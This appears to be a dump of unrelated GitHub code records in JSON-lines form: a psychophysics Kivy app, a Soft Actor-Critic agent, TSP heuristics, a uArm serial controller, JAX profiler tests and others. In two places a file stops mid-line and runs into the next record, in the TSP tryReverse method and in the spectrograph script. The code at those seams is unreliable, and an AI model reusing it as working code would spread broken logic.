right_or_wrong = int(rel_pos == correct_ans)\n global psi_obj\n psi_obj.addData(right_or_wrong)\n while psi_obj.xCurrent is None:\n pass\n\n # next step deviation angle\n if rel_pos == 'left':\n\n # Set the left limit\n if (self.ids.cw.quad_points[6] + self.ids.cw.height*math.tan(math.radians(psi_obj.xCurrent)) < self.ids.cw.x):\n self.ids.cw.degree = math.degrees(math.atan((self.ids.cw.x - self.ids.cw.quad_points[6]) / self.ids.cw.height))\n else:\n self.ids.cw.degree = float(psi_obj.xCurrent)\n\n elif rel_pos == 'right':\n\n # Set the right limit\n if (self.ids.cw.quad_points[6] + self.ids.cw.height*math.tan(math.radians(psi_obj.xCurrent)) > self.ids.cw.right):\n self.ids.cw.degree = math.degrees(math.atan((self.ids.cw.right - self.ids.cw.quad_points[6]) / self.ids.cw.height))\n else:\n self.ids.cw.degree = float(psi_obj.xCurrent)\n\n #global subj_trial_info\n subj_trial_info[\"_\".join([\"TRIAL\", str(self.trial_total)])] = {'session': self.session_num, 'trial_in_session': self.trial_num, 'reference(deg)': self.ids.cw.false_ref, 'offset(deg)': degree_current, 'correct_x': self.ids.cw.x_correct, 'x_coord_current': x_coord_current, 'correct_ans': correct_ans, 'response': self.prev_choice[-1], 'response_correct': right_or_wrong}\n\n self.trial_num += 1\n self.trial_total += 1\n\n\n # Print the trial number and the deviation angle(deg)\n # The value of the deviation angle is the angle between\n # - the vertical line that passes the MP joint\n # - the line that connects the MP joint and the upper right point of the quadrilateral\n #print(\"trial: \", self.trial_num, \"session: \", self.session_num, \"correct_ans: \", correct_ans, \"rel_pos: \", rel_pos, \"right_or_wrong: \", right_or_wrong, \"Previous_delta_d: \", degree_current, \"Next delta_d: \", self.ids.cw.degree, self.ids.cw.false_ref)\n\n if self.trial_num == 50:\n self.reset(self.session_num)\n\n def reset(self, session_num):\n # Renew the list of stored choices\n self.prev_choice = list()\n\n # Trial number renewed\n self.trial_num = 0\n\n # Psi marginal algorithm refreshed\n global psi_obj\n psi_obj = Psi(stimLevels, Pfunction = 'Gumbel', nTrials = ntrials, threshold = mu, thresholdPrior = thresholdPrior, slope = sigma, slopePrior = slopePrior, guessRate = guessRate, guessPrior = ('uniform', None), lapseRate = lapse, lapsePrior = lapsePrior, marginalize = True)\n\n # New display setting\n self.ids.cw.degree = float(psi_obj.xCurrent)\n\n if session_num == 0:\n # A new session begins\n self.session_num +=1\n\n # False reference moving to 45\n self.ids.cw.false_ref = 45\n # ... and the psi output will now be \"added\"\n self.ids.cw.degree_dir = 1\n\n # There's no turning back\n self.ids.layout.remove_widget(self.ids._backward)\n\n # The buttons would be disabled until an experimenter presses the 'resume' button\n self.ids._more_left.disabled = True\n self.ids._more_right.disabled = True\n\n # Only two sessions exist: 0 or 1\n # If session 1 finishes, you reset everthing to have a next subject\n else:\n # Dump everything to the store\n store.put(subid, subj_info = subj_info, subj_anth = subj_anth, subj_trial_info = subj_trial_info)\n\n self.session_num -= 1\n\n # False reference returning to 55\n self.ids.cw.false_ref = 55\n # ... and the psi output \"subtracted\"\n self.ids.cw.degree_dir = -1\n\n # Bring the back button again\n self.ids.layout.add_widget(self.ids._backward)\n\n # Total trial count reset to 0\n self.trial_total = 0\n\n # Go to the outcome screen\n self.parent.current = \"outcome_screen\"\n\nclass OutcomeScreen(Screen):\n\n def start_a_new_subject(self):\n self.parent.current = \"param_screen_one\"\n\nclass screen_manager(ScreenManager):\n pass\n\nclass ProprioceptiveApp(App):\n\n def build(self):\n return screen_manager(transition=FadeTransition())\n\nif __name__ == '__main__':\n ProprioceptiveApp().run()\n","repo_name":"ohspc89/FingerProprioceptionApp","sub_path":"Psi-marginal/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30994,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"8947841043","text":"import numpy as np\nfrom Brain.model import PolicyNetwork, QValueNetwork\nimport torch\nfrom Memory.replay_memory import Memory, Transition\nfrom torch import from_numpy\nfrom torch.optim.adam import Adam\nfrom torch.nn import functional as F\n\n\nclass SAC:\n def __init__(self, **config):\n self.config = config\n self.state_shape = self.config[\"state_shape\"]\n self.n_actions = self.config[\"n_actions\"]\n self.lr = self.config[\"lr\"]\n self.gamma = self.config[\"gamma\"]\n self.batch_size = self.config[\"batch_size\"]\n self.memory = Memory(memory_size=self.config[\"mem_size\"])\n\n self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n self.policy_network = PolicyNetwork(state_shape=self.state_shape, n_actions=self.n_actions).to(self.device)\n self.q_value_network1 = QValueNetwork(state_shape=self.state_shape, n_actions=self.n_actions).to(self.device)\n self.q_value_network2 = QValueNetwork(state_shape=self.state_shape, n_actions=self.n_actions).to(self.device)\n self.q_value_target_network1 = QValueNetwork(state_shape=self.state_shape,\n n_actions=self.n_actions).to(self.device)\n self.q_value_target_network2 = QValueNetwork(state_shape=self.state_shape,\n n_actions=self.n_actions).to(self.device)\n\n self.q_value_target_network1.load_state_dict(self.q_value_network1.state_dict())\n self.q_value_target_network1.eval()\n\n self.q_value_target_network2.load_state_dict(self.q_value_network2.state_dict())\n self.q_value_target_network2.eval()\n\n self.entropy_target = 0.98 * (-np.log(1 / self.n_actions))\n self.log_alpha = torch.zeros(1, requires_grad=True, device=self.device)\n self.alpha = self.log_alpha.exp()\n\n self.q_value1_opt = Adam(self.q_value_network1.parameters(), lr=self.lr)\n self.q_value2_opt = Adam(self.q_value_network2.parameters(), lr=self.lr)\n self.policy_opt = Adam(self.policy_network.parameters(), lr=self.lr)\n self.alpha_opt = Adam([self.log_alpha], lr=self.lr)\n\n self.update_counter = 0\n\n def store(self, state, action, reward, next_state, done):\n state = from_numpy(state).byte().to(\"cpu\")\n reward = torch.CharTensor([reward])\n action = torch.ByteTensor([action]).to('cpu')\n next_state = from_numpy(next_state).byte().to('cpu')\n done = torch.BoolTensor([done])\n self.memory.add(state, reward, done, action, next_state)\n\n def unpack(self, batch):\n batch = Transition(*zip(*batch))\n\n states = torch.cat(batch.state).to(self.device).view(self.batch_size, *self.state_shape)\n actions = torch.cat(batch.action).view((-1, 1)).long().to(self.device)\n rewards = torch.cat(batch.reward).view((-1, 1)).to(self.device)\n next_states = torch.cat(batch.next_state).to(self.device).view(self.batch_size, *self.state_shape)\n dones = torch.cat(batch.done).view((-1, 1)).to(self.device)\n\n return states, rewards, dones, actions, next_states\n\n def train(self):\n if len(self.memory) < self.batch_size:\n return 0, 0, 0\n else:\n batch = self.memory.sample(self.batch_size)\n states, rewards, dones, actions, next_states = self.unpack(batch)\n\n # Calculating the Q-Value target\n with torch.no_grad():\n _, next_probs = self.policy_network(next_states)\n next_log_probs = torch.log(next_probs)\n next_q1 = self.q_value_target_network1(next_states)\n next_q2 = self.q_value_target_network2(next_states)\n next_q = torch.min(next_q1, next_q2)\n next_v = (next_probs * (next_q - self.alpha * next_log_probs)).sum(-1).unsqueeze(-1)\n target_q = rewards + self.gamma * (~dones) * next_v\n\n q1 = self.q_value_network1(states).gather(1, actions)\n q2 = self.q_value_network2(states).gather(1, actions)\n q1_loss = F.mse_loss(q1, target_q)\n q2_loss = F.mse_loss(q2, target_q)\n\n # Calculating the Policy target\n _, probs = self.policy_network(states)\n log_probs = torch.log(probs)\n with torch.no_grad():\n q1 = self.q_value_network1(states)\n q2 = self.q_value_network2(states)\n q = torch.min(q1, q2)\n\n policy_loss = (probs * (self.alpha.detach() * log_probs - q)).sum(-1).mean()\n\n self.q_value1_opt.zero_grad()\n q1_loss.backward()\n self.q_value1_opt.step()\n\n self.q_value2_opt.zero_grad()\n q2_loss.backward()\n self.q_value2_opt.step()\n\n self.policy_opt.zero_grad()\n policy_loss.backward()\n self.policy_opt.step()\n\n log_probs = (probs * log_probs).sum(-1)\n alpha_loss = -(self.log_alpha * (log_probs.detach() + self.entropy_target)).mean()\n\n self.alpha_opt.zero_grad()\n alpha_loss.backward()\n self.alpha_opt.step()\n\n self.update_counter += 1\n\n self.alpha = self.log_alpha.exp()\n\n if self.update_counter % self.config[\"fixed_network_update_freq\"] == 0:\n self.hard_update_target_network()\n\n return alpha_loss.item(), 0.5 * (q1_loss + q2_loss).item(), policy_loss.item()\n\n def choose_action(self, states, do_greedy=False):\n states = np.expand_dims(states, axis=0)\n states = from_numpy(states).byte().to(self.device)\n with torch.no_grad():\n dist, p = self.policy_network(states)\n if do_greedy:\n action = p.argmax(-1)\n else:\n action = dist.sample()\n return action.detach().cpu().numpy()[0]\n\n def hard_update_target_network(self):\n self.q_value_target_network1.load_state_dict(self.q_value_network1.state_dict())\n self.q_value_target_network1.eval()\n self.q_value_target_network2.load_state_dict(self.q_value_network2.state_dict())\n self.q_value_target_network2.eval()\n\n def set_to_eval_mode(self):\n self.policy_network.eval()\n","repo_name":"alirezakazemipour/Discrete-SAC-PyTorch","sub_path":"Brain/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":6236,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"94"} +{"seq_id":"7689687636","text":"import math\n\n#provided function\ndef euclid(p,q):\n x = p[0]-q[0]\n y = p[1]-q[1]\n return math.sqrt(x*x+y*y)\n \nclass Graph:\n\n # Complete as described in the specification, taking care of two cases:\n # the -1 case, where we read points in the Euclidean plane, and\n # the n>0 case, where we read a general graph in a different format.\n # self.perm, self.dists, self.n are the key variables to be set up.\n def __init__(self,n,filename):\n if n == -1: #Intializing where flag is -1\n self.perm = []\n self.n = 0\n for line in open(filename).readlines( ): #number of node is equivalent to number of lines\n self.n += 1 #Increments number of nodes with every iteration\n with open (filename) as fp: #This creates a list of tuples from the given file\n result = []\n for i in fp.readlines():\n tmp = i.encode().split() #encode() is used to get set of bytes instead of str for the split, splits at the middle space\n result.append((int(tmp[0]),int(tmp[1]))) #creates the tuple from the 2 parts of the split\n self.dists = [[0 for x in range (self.n)] for y in range (self.n)]\n for i in range(self.n):\n for j in range(self.n): #using the list of tuples to fill self.dists\n self.dists[i][j] = self.dists[j][i] = euclid(result[i],result[j])\n for y in range (self.n):\n self.perm.append(y)\n \n else: #For case where n is given\n self.perm = []\n self.n = n \n with open (filename) as fp:\n result = []\n for i in fp.readlines(): #Creates list of tuples (with 3 elements) from the given file\n tmp = i.encode().split() #same as above\n result.append((int(tmp[0]),int(tmp[1]),int(tmp[2]))) #creates the tuples from the 3 parts of the split\n self.dists = [[0 for x in range (self.n)] for y in range (self.n)]\n for i in result: #using list of tuples to fill self.dists\n self.dists[i[0]][i[1]] = self.dists[i[1]][i[0]] = i[2]\n for y in range (self.n):\n self.perm.append(y)\n \n # Complete as described in the spec, to calculate the cost of the\n # current tour (as represented by self.perm).\n def tourValue(self):\n totalCost = 0\n for x in range (self.n):\n totalCost += self.dists[self.perm[x]][self.perm[(x+1)%self.n]] #Modulo to wraparound\n return totalCost\n \n \n # Below are given functions \n def swapHeuristic(self):\n better = True\n while better:\n better = False\n for i in range(self.n):\n if self.trySwap(i):\n better = True\n \n\n def TwoOptHeuristic(self):\n better = True\n while better:\n better = False\n for j in range(self.n-1):\n for i in range(j):\n if self.tryReverse(i,j):\n better = True\n # End of given functions\n \n # Attempt the swap of cities i and i+1 in self.perm and commit\n # commit to the swap if it improves the cost of the tour.\n # Return True/False depending on success.\n def trySwap(self,i):\n \n normalCost = self.dists[self.perm[i]][self.perm[(i-1)%self.n]] #calculating cost of original permutation \n normalCost += self.dists[self.perm[(i+2)%self.n]][self.perm[(i+1)%self.n]]\n #calculating cost of swap only at the swap location to avoid expensive algorithm (by calling tourValue each time)\n changedCost = self.dists[self.perm[i]][self.perm[(i+2)%self.n]]\n changedCost += self.dists[self.perm[(i+1)%self.n]][self.perm[(i-1)%self.n]]\n \n if (changedCost < normalCost): #performing swap if cost is less\n #saving current values\n a = self.perm[i]\n b = self.perm[(i+1)%self.n]\n #performing the swap\n self.perm[i] = b\n self.perm[(i+1)%self.n] = a\n return True\n else:\n return False\n\n\n # Consider the effect of reversiing the segment between\n # self.perm[i] and self.perm[j], and commit to the reversal\n # if it improves the tour value.\n # Return True/False depending on success. \n # \n def tryReverse(self,i,j):\n normalCost = self.dists[self.perm[i]][self.perm[(i-1)%self.n]] #calculating cost of original permutation \n normalCost += self.dists[self.perm[j]][self.perm[(j+1)%self.n]]\n #calculating cost of swap only at the swap location to avoid expensive algorithm (by calling tourValue each time)\n changedCost = self.dists[self.perm[j]][self.perm[(i-1)%self.n]] \n changedCost += self.dists[self.perm[i]][self.perm[(j+1)%self.n]]\n \n if (changedCost>> import serial\n>>> import uarm_serial\n>>> conn = serial.serial_for_url()\n>>> arm = uarm_serial.uArmSerial(conn)\n\nYou are now connected to the arm.\n\n>>> arm.attach_all()\nThis will enable all serial motors - it is not the default - you may want to relax\nthem to save power, or so the open feedack potentiometers can be used as sensors.\nSee the demo functions at the bottom for examples of movement.\ndemo_setup is currently configured for my own test machine.\n\"\"\"\n\nimport serial\nfrom functools import partial\nimport logging\n\nclass uArmSerial(object):\n def __init__(self, serial_conn):\n \"\"\"Params - a connected serial port going to the\n Arduino on the uArm running uARm serial\"\"\"\n self._serial_conn = serial_conn\n self._serial_conn.timeout = 0.1\n self.gripper = partial(self._safe_position, 90, 40, 0)\n self.wrist = partial(self._safe_position, 120, 0, 1)\n self.base = partial(self._safe_position, 120, 30, 2)\n self.elbow = partial(self._safe_position, 90, 10, 3)\n self.shoulder = partial(self._safe_position, 110, 30, 4)\n self.clear = True\n #todo determine limits\n #todo - read pots\n #todo cal, and store/read cal data\n self.clear_response()\n\n def _write_conn(self, data):\n logging.info(data)\n self._serial_conn.write(\n bytes(data, 'utf-8')\n )\n\n# def decode_lines(self, lines):\n# \"\"\"Decodes list of utf-8 bytearrays\"\"\"\n# lines_decoded\n \n def clear_response(self, force=True):\n if self.clear or force:\n output = self._serial_conn.readlines()\n output = [line.decode('utf-8') for line in output]\n output = ''.join(output)\n if output:\n logging.info( \"Flushing...\\n%s\", output)\n logging.info(\"Flushed\")\n \n def _write_motor(self, motor_number, position):\n \"\"\"Format a serial string and send it\"\"\"\n cmd = \"P%d,%d;\" % (motor_number, position)\n self._write_conn(cmd)\n\n def attach(self, joint_no):\n \"\"\"Attach a servo (power it)\"\"\"\n cmd = \"A%d;\" % (joint_no)\n self._write_conn(cmd)\n self.clear_response()\n\n def detach(self, joint_no):\n \"\"\"Detach servo - save power, or become sense only\"\"\"\n cmd = \"D%d;\" % (joint_no)\n self._write_conn(cmd)\n self.clear_response()\n \n def detach_all(self):\n \"\"\"Detach all - good for record\"\"\"\n [self.detach(n) for n in range(5)]\n\n def attach_all(self):\n [self.attach(n) for n in range(5)]\n \n def read_pot(self, pot_no):\n \"\"\"Read a potentiometer on the arm\"\"\"\n self.clear(force=True)\n cmd = \"?%d;\" % (pot_no)\n self._write_conn(cmd)\n response = ''.join(self._serial_conn.readlines()).decode('utf-8')\n logging.info(response)\n response = response[1].strip()\n return int(response)\n \n def _safe_position(self, high, low, motor_no, position):\n assert low <= position <= high\n self._write_motor(motor_no, position)\n \nimport time\n\ndef go_demo(arm):\n arm.gripper(40)\n arm.shoulder(90)\n arm.elbow(90)\n time.sleep(1)\n arm.shoulder(30)\n arm.elbow(60)\n time.sleep(1)\n arm.gripper(90)\n time.sleep(1)\n arm.shoulder(90)\n time.sleep(0.4)\n arm.elbow(90)\n \n\ndef demo_setup():\n logging.basicConfig(level=logging.INFO)\n import platform\n if 'linux' in platform.platform().lower():\n conn = serial.serial_for_url(\"/dev/ttyUSB0\")\n conn.baudrate = 9600\n else:\n conn = serial.serial_for_url(\"COM4:9600\")\n conn.timeout = 0.1\n found_ready = False\n while not found_ready:\n data = [line.decode('utf-8') for line in conn.readlines()]\n data = ''.join(data)\n found_ready = 'Ready' in data\n if data:\n print(data)\n \n arm = uArmSerial(conn)\n arm.attach_all()\n arm.wrist(87)\n arm.clear = False\n go_demo(arm)\n conn.close()\n \n\n# demo_setup()\n# import time\n# \n# try:\n# arm = uArmSerial(conn)\n# while True:\n# logging.info( [arm.read_pot(n) for n in range(5)])\n# time.sleep(0.1)\n# arm.gripper(10)\n# time.sleep(1)\n# arm.gripper(80)\n# arm.read_pot(0)\n# finally:\n# conn.close()\n","repo_name":"orionrobots/armbot","sub_path":"uarm_serial.py","file_name":"uarm_serial.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10051865328","text":"from sre_constants import SUCCESS\nimport streamlit as st\n\n#1 create widget\nimport time\nst.balloons()\nst.progress(100)\nwith st.spinner(\"Loading\"): time.sleep(2)\n\nst.success(\"Success\")\nst.error(\"Error\")\nst.warning(\"Warning\")\nst.info(\"It's easy to build app with streamlit\")\nst.exception(RuntimeError(\"RuntimeError exception\"))\n\n#2 create sidebar \nst.sidebar.title(\"Streamlit Learning\")\nst.sidebar.button(\"Module 1\")\nst.sidebar.radio(\"Module\",[\"1\",\"2\",\"3\"])\n\n#3 widgte\nst.checkbox('yes')\nst.button(\"click\")\nst.radio(\"Gender\",[\"Male\",\"Female\"])\nst.selectbox(\"Gender\",[\"Male\",\"Female\"])\nst.multiselect(\"Gender\",[\"Male\",\"Female\",\"Other\"])\nst.select_slider(\"Gender\",[\"Male\",\"Female\",\"Other\"])\nst.slider('Number',0,50)\n\n#6 formula math\nst.markdown(\"markdown\")\nst.code(\"x=2022\")\nst.latex(r'''a+a r^1+a r^2+a r^3 ''') # untuk nulis persamaan\n\n\n#9 line chart\nimport pandas as pd\nimport numpy as np\ndf = pd.DataFrame(\n np.random.randn(10,2),\n columns=[\"x\",\"y\"])\nst.line_chart(df)\n\n#12 area chart\ndf=pd.DataFrame(\n np.random.randn(10,2),\n columns=[\"x\",\"y\"])\nst.area_chart(df)\n\n#13 Map\ndf=pd.DataFrame(np.random.randn(500,2)/[50,50]+[37.76, -122.4],\ncolumns=['lat','lon'])\nst.map(df)\n","repo_name":"ryryrizki/streamlit","sub_path":"Latihan1.py","file_name":"Latihan1.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17056622767","text":"from functools import partial\nimport glob\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport threading\nimport time\nimport unittest\nfrom absl.testing import absltest\n\nimport jax\nimport jax.numpy as jnp\nimport jax.profiler\nfrom jax import config\nfrom jax._src.lib import xla_extension_version\nimport jax._src.test_util as jtu\n\ntry:\n import portpicker\nexcept ImportError:\n portpicker = None\n\ntry:\n from tensorflow.python.profiler import profiler_client\n from tensorflow.python.profiler import profiler_v2 as tf_profiler\nexcept ImportError:\n profiler_client = None\n tf_profiler = None\n\nTBP_ENABLED = False\ntry:\n import tensorboard_plugin_profile\n del tensorboard_plugin_profile\n TBP_ENABLED = True\nexcept ImportError:\n pass\n\nconfig.parse_flags_with_absl()\n\n\nclass ProfilerTest(unittest.TestCase):\n # These tests simply test that the profiler API does not crash; they do not\n # check functional correctness.\n\n def setUp(self):\n super().setUp()\n self.worker_start = threading.Event()\n self.profile_done = False\n\n @unittest.skipIf(not portpicker, \"Test requires portpicker\")\n def testStartStopServer(self):\n port = portpicker.pick_unused_port()\n jax.profiler.start_server(port=port)\n del port\n jax.profiler.stop_server()\n\n @unittest.skipIf(not portpicker, \"Test requires portpicker\")\n def testCantStartMultipleServers(self):\n port = portpicker.pick_unused_port()\n jax.profiler.start_server(port=port)\n port = portpicker.pick_unused_port()\n with self.assertRaisesRegex(\n ValueError, \"Only one profiler server can be active at a time.\"):\n jax.profiler.start_server(port=port)\n jax.profiler.stop_server()\n\n def testCantStopServerBeforeStartingServer(self):\n with self.assertRaisesRegex(ValueError, \"No active profiler server.\"):\n jax.profiler.stop_server()\n\n def testProgrammaticProfiling(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n try:\n jax.profiler.start_trace(tmpdir)\n jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(\n jnp.ones(jax.local_device_count()))\n finally:\n jax.profiler.stop_trace()\n\n proto_path = glob.glob(os.path.join(tmpdir, \"**/*.xplane.pb\"),\n recursive=True)\n self.assertEqual(len(proto_path), 1)\n with open(proto_path[0], \"rb\") as f:\n proto = f.read()\n # Sanity check that serialized proto contains host, device, and\n # Python traces without deserializing.\n self.assertIn(b\"/host:CPU\", proto)\n if jtu.test_device_matches([\"tpu\"]):\n self.assertIn(b\"/device:TPU\", proto)\n self.assertIn(b\"pxla.py\", proto)\n\n def testProfilerGetFDOProfile(self):\n if xla_extension_version < 206:\n raise unittest.SkipTest(\"API version < 206\")\n # Tests stop_and_get_fod_profile could run.\n try:\n jax.profiler.start_trace(\"test\")\n jax.pmap(lambda x: jax.lax.psum(x + 1, \"i\"), axis_name=\"i\")(\n jnp.ones(jax.local_device_count())\n )\n finally:\n fdo_profile = jax._src.profiler.stop_and_get_fdo_profile()\n if jtu.test_device_matches([\"gpu\"]) and jtu.is_device_cuda():\n self.assertIn(b\"copy\", fdo_profile)\n\n def testProgrammaticProfilingErrors(self):\n with self.assertRaisesRegex(RuntimeError, \"No profile started\"):\n jax.profiler.stop_trace()\n\n try:\n with tempfile.TemporaryDirectory() as tmpdir:\n jax.profiler.start_trace(tmpdir)\n with self.assertRaisesRegex(\n RuntimeError,\n \"Profile has already been started. Only one profile may be run at a \"\n \"time.\"):\n jax.profiler.start_trace(tmpdir)\n finally:\n jax.profiler.stop_trace()\n\n def testProgrammaticProfilingContextManager(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n with jax.profiler.trace(tmpdir):\n jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(\n jnp.ones(jax.local_device_count()))\n\n proto_path = glob.glob(os.path.join(tmpdir, \"**/*.xplane.pb\"),\n recursive=True)\n self.assertEqual(len(proto_path), 1)\n with open(proto_path[0], \"rb\") as f:\n proto = f.read()\n # Sanity check that serialized proto contains host and device traces\n # without deserializing.\n self.assertIn(b\"/host:CPU\", proto)\n if jtu.test_device_matches([\"tpu\"]):\n self.assertIn(b\"/device:TPU\", proto)\n\n def testTraceAnnotation(self):\n x = 3\n with jax.profiler.TraceAnnotation(\"mycontext\"):\n x = x + 2\n\n def testTraceFunction(self):\n @jax.profiler.annotate_function\n def f(x, *, y):\n return x + 2 * y\n self.assertEqual(f(7, y=3), 13)\n\n @jax.profiler.annotate_function\n def f(x, *, name):\n return x + 2 * len(name)\n self.assertEqual(f(7, name=\"abc\"), 13)\n\n @partial(jax.profiler.annotate_function, name=\"aname\")\n def g(x):\n return x + 2\n self.assertEqual(g(7), 9)\n\n @partial(jax.profiler.annotate_function, name=\"aname\", akwarg=\"hello\")\n def h(x):\n return x + 2\n self.assertEqual(h(7), 9)\n\n def testDeviceMemoryProfile(self):\n x = jnp.ones((20,)) + 7.\n self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)\n del x\n\n def _check_xspace_pb_exist(self, logdir):\n path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')\n self.assertEqual(1, len(glob.glob(path)),\n 'Expected one path match: ' + path)\n\n @unittest.skip(\"Test causes OOMs\")\n @unittest.skipIf(not (portpicker and profiler_client and tf_profiler),\n \"Test requires tensorflow.profiler and portpicker\")\n def testSingleWorkerSamplingMode(self, delay_ms=None):\n def on_worker(port, worker_start):\n jax.profiler.start_server(port)\n worker_start.set()\n x = jnp.ones((1000, 1000))\n while True:\n with jax.profiler.TraceAnnotation(\"atraceannotation\"):\n jnp.dot(x, x.T).block_until_ready()\n if self.profile_done:\n jax.profiler.stop_server()\n break\n\n def on_profile(port, logdir, worker_start):\n worker_start.wait()\n options = tf_profiler.ProfilerOptions(\n host_tracer_level=2,\n python_tracer_level=2,\n device_tracer_level=1,\n delay_ms=delay_ms,\n )\n\n # Request for 1000 milliseconds of profile.\n duration_ms = 1000\n profiler_client.trace(f'localhost:{port}', logdir, duration_ms,\n '', 1000, options)\n self.profile_done = True\n\n logdir = absltest.get_default_test_tmpdir()\n # Remove any existing log files.\n shutil.rmtree(logdir, ignore_errors=True)\n port = portpicker.pick_unused_port()\n thread_profiler = threading.Thread(\n target=on_profile, args=(port, logdir, self.worker_start))\n thread_worker = threading.Thread(\n target=on_worker, args=(port, self.worker_start))\n thread_worker.start()\n thread_profiler.start()\n thread_profiler.join()\n thread_worker.join(120)\n self._check_xspace_pb_exist(logdir)\n\n @unittest.skipIf(\n not (portpicker and profiler_client and tf_profiler and TBP_ENABLED),\n \"Test requires tensorflow.profiler, portpicker and \"\n \"tensorboard_profile_plugin\")\n def test_remote_profiler(self):\n port = portpicker.pick_unused_port()\n jax.profiler.start_server(port)\n\n logdir = absltest.get_default_test_tmpdir()\n # Remove any existing log files.\n shutil.rmtree(logdir, ignore_errors=True)\n def on_profile():\n os.system(\n f\"{sys.executable} -m jax.collect_profile {port} 500 \"\n f\"--log_dir {logdir} --no_perfetto_link\")\n\n thread_profiler = threading.Thread(\n target=on_profile, args=())\n thread_profiler.start()\n start_time = time.time()\n y = jnp.zeros((5, 5))\n while time.time() - start_time < 10:\n y = jnp.dot(y, y)\n jax.profiler.stop_server()\n thread_profiler.join()\n self._check_xspace_pb_exist(logdir)\n\nif __name__ == \"__main__\":\n absltest.main(testLoader=jtu.JaxTestLoader())\n","repo_name":"google/jax","sub_path":"tests/profiler_test.py","file_name":"profiler_test.py","file_ext":"py","file_size_in_byte":7983,"program_lang":"python","lang":"en","doc_type":"code","stars":25647,"dataset":"github-code","pt":"94"} +{"seq_id":"36213726717","text":"from typing import List\n\n\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\n\nclass NAryTreeLevelOrderTraversal:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n q, ret = [root], []\n while any(q):\n ret.append([node.val for node in q])\n q = [child for node in q for child in node.children if child]\n return ret\n\n def levelOrder2(self, root: 'Node') -> List[List[int]]:\n # 当做队列\n q = [root]\n res = []\n while q:\n temp = []\n next_stack = []\n for node in q:\n temp.append(node.val)\n for child in node.children:\n next_stack.append(child)\n res.append(temp)\n q = next_stack\n return res\n","repo_name":"jacksonyoudi/AlgorithmCode","sub_path":"PyProject/leetcode/history/n-ary-tree-level-order-traversal.py","file_name":"n-ary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"20417094509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 20 20:57:50 2021\n\n@author: carlos\n\"\"\"\n#%% ------------------------------DATA-----------------------------------------\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Telescope:\nD = 0.5 # m\nf_D = 15 \nF = f_D*D\n# Lents and collimator:\nf_1 = 220e-3 # m\nd_1 = 38e-3 # m \nf_d_1 = f_1/d_1\nf_2 = 220e-3 # m\nd_2 = 38e-3 # m \nf_d_2 = f_2/d_2\n#print(f_D_l)\n# Grid\nlenth = 40 # mm\nsigma_1 = 300 # lines/mm\nBlaze = 5 # º\nBlaze_SI = Blaze*np.pi/180\nalpha = 0 \nseeing = 1 # \"\nlam = 5000 # \\AA\n# Detector: \nL = 150 # pixels \nl = 15 # microns/pixel\nl *= 1e-6 # m/pixel\n# In[i] Ancho del filtro\n\nsigma = 1/sigma_1\n\nbeta = 2*Blaze_SI\n\n# Orden en que lam tiene la máxima eficiencia \n\nm = sigma*1e7/lam*(np.sin(alpha)+np.sin(2*Blaze_SI+alpha))\nlam_max = sigma*1e7/int(m)*(np.sin(alpha)+np.sin(2*Blaze_SI+alpha))\n\n# Pureza espectral libre, de acuerdo con la f: \n \nD_lam = 2*lam/(2*int(m)+3)\n\n# Considerando un criterio de ancho de filtro de +-1/3 o +-1/4:\nprint('Ancho del filtro ',D_lam,'\\AA')\n\n\n# In[ii] Pureza espectral dada por la red\nBeta = np.arcsin(int(m)*lam*1e-7/sigma)\n\ndl = lambda r_1, w_1, A_1: r_1*w_1/A_1/f_1\n\n# Ángulo subtendido por la rendija sobre el cielo:\nPhi = seeing/3600 # deg\nPhi *= np.pi/180 # rad\n\n# CONSIDERANDO QUE LA RED NO ESTÁ TOTALMENTE ILUMINADA:\n \nW = f_1/f_D # m. Diámetro del cono de luz que ilumina el colimador. \nBeta = np.arcsin(int(m)*lam*1e-7/sigma) # Ángulo Beta, sacado de la ecuación de red. \n\nR = W*(np.sin(Beta)+np.sin(alpha))/Phi/D # Ec. 13.2.5 del Astronomical Optics\nd_lam = lam/R\nprint('Pureza espectral dada por la red: ',d_lam,'\\AA')\n\n\n\n# In[iii]\n# Dispersión angular:\n#A1 = (np.sin(alpha)+np.sin(beta))/np.cos(beta)/lam # rad/\\AA\nA = int(m)/np.cos(beta)/sigma #rad/mm\nA *= 1e-7 # rad/\\AA\n# Dispersión lineal:\nP_1 = A*f_2 # m/\\AA\n\n# Tamaño del detector CCD:\nT = L*l # m\n\n# Rango espectral cubierto por el detector:\nD_lam = T/P_1\nprint('Rango espectral cubierto por el detector CCD: ', D_lam,'\\AA')\n\nD_lam_pix = D_lam/L\n# ¿Cumple el teorema del muestreo?\nprint('Si cumple el teorema del muestreo: ',2*D_lam_pix\"\n","repo_name":"jwphantom/tp_2_python_for_data_science","sub_path":"app/models/town.py","file_name":"town.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"28590180635","text":"from PIL import Image\n\nfrom scythe.base import BaseSingleFileExtractor\n\n\nclass ImageExtractor(BaseSingleFileExtractor):\n \"\"\"Retrieves basic information about an image\"\"\"\n\n def _extract_file(self, file_path, context=None):\n im = Image.open(file_path)\n 